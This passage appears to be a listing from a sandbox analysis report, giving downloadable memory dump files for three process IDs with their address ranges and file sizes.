            Filesize

            5.6MB

            Download

          • memory/1580-298-0x00000000076E0000-0x0000000007702000-memory.dmp

            Filesize

            136KB

            Download

          • memory/1580-299-0x0000000007750000-0x0000000007764000-memory.dmp

            Filesize

            80KB

            Download

          • memory/1580-274-0x0000000004E70000-0x0000000004E80000-memory.dmp

            Filesize

            64KB

            Download

          • memory/1580-275-0x00000000054B0000-0x0000000005AD8000-memory.dmp

            Filesize

            6.2MB

            Download

          • memory/1580-273-0x0000000002930000-0x0000000002966000-memory.dmp

            Filesize

            216KB

            Download

          • memory/1580-303-0x0000000007990000-0x0000000007991000-memory.dmp

            Filesize

            4KB

            Download

          • memory/1580-304-0x0000000008CC0000-0x000000000DBC0000-memory.dmp

            Filesize

            79.0MB

            Download

          • memory/1580-305-0x0000000074530000-0x0000000074CE0000-memory.dmp

            Filesize

            7.7MB

            Download

          • memory/1580-307-0x0000000004E70000-0x0000000004E80000-memory.dmp

            Filesize

            64KB

            Download

          • memory/1580-308-0x0000000004E70000-0x0000000004E80000-memory.dmp

            Filesize

            64KB

            Download

          • memory/1580-309-0x0000000004E70000-0x0000000004E80000-memory.dmp

            Filesize

            64KB

            Download

          • memory/1580-310-0x0000000076F51000-0x0000000077071000-memory.dmp

            Filesize

            1.1MB

            Download

          • memory/1580-311-0x0000000004E70000-0x0000000004E80000-memory.dmp

            Filesize

            64KB

            Download

          • memory/1580-272-0x0000000074530000-0x0000000074CE0000-memory.dmp

            Filesize

            7.7MB

            Download

          • memory/1580-288-0x0000000005C10000-0x0000000005F64000-memory.dmp

            Filesize

            3.3MB

            Download

          • memory/1580-380-0x0000000074530000-0x0000000074CE0000-memory.dmp

            Filesize

            7.7MB

            Download

          • memory/4428-313-0x0000000076F51000-0x0000000077071000-memory.dmp

            Filesize

            1.1MB

            Download

          • memory/4428-378-0x0000000000E00000-0x0000000002054000-memory.dmp

            Filesize

            18.3MB

            Download

          • memory/4428-379-0x0000000000E00000-0x0000000002054000-memory.dmp

            Filesize

            18.3MB

            Download

          • memory/4428-326-0x0000000002060000-0x0000000006F60000-memory.dmp

            Filesize

            79.0MB

            Download

          • memory/4428-327-0x0000000076F51000-0x0000000077071000-memory.dmp

            Filesize

            1.1MB

            Download

          • memory/4428-381-0x0000000000E00000-0x0000000002054000-memory.dmp

            Filesize

            18.3MB

            Download

          • memory/4428-389-0x0000000000E00000-0x0000000002054000-memory.dmp

            Filesize

            18.3MB

            Download

          • memory/4428-312-0x0000000076FD8000-0x0000000076FD9000-memory.dmp

            Filesize

            4KB

            Download

          • memory/4428-393-0x0000000000E00000-0x0000000002054000-memory.dmp

            Filesize

            18.3MB

            Download

          • memory/4428-397-0x0000000000E00000-0x0000000002054000-memory.dmp

            Filesize

            18.3MB

            Download

          • memory/4428-398-0x0000000000E00000-0x0000000002054000-memory.dmp

            Filesize

            18.3MB

            Download

          • memory/4428-396-0x0000000002060000-0x0000000006F60000-memory.dmp

            Filesize

            79.0MB

            Download

          • memory/4428-399-0x0000000000E00000-0x0000000002054000-memory.dmp

            Filesize

            18.3MB

            Download

          • memory/4428-401-0x0000000000E00000-0x0000000000E82000-memory.dmp

            Filesize

            520KB

            Download

          • memory/4428-402-0x0000000000E00000-0x0000000000E82000-memory.dmp

            Filesize

            520KB

            Download

          • memory/4428-403-0x0000000000E00000-0x0000000002054000-memory.dmp

            Filesize

            18.3MB

            Download

          • memory/4428-404-0x0000000000E00000-0x0000000002054000-memory.dmp

            Filesize

            18.3MB

            Download

          • memory/4428-405-0x0000000000E00000-0x0000000002054000-memory.dmp

            Filesize

            18.3MB

            Download

          • memory/4428-406-0x0000000000E00000-0x0000000002054000-memory.dmp

            Filesize

            18.3MB

            Download

          • memory/4492-423-0x0000026548150000-0x0000026548160000-memory.dmp

            Filesize

            64KB

            Download

          • memory/4492-439-0x00000265504C0000-0x00000265504C1000-memory.dmp

            Filesize

            4KB

            Download

          • memory/4492-441-0x00000265504F0000-0x00000265504F1000-memory.dmp

            Filesize

            4KB

            Download

          • memory/4492-442-0x00000265504F0000-0x00000265504F1000-memory.dmp

            Filesize

            4KB

            Download

          • memory/4492-443-0x0000026550600000-0x0000026550601000-memory.dmp

            Filesize

            4KB

            Download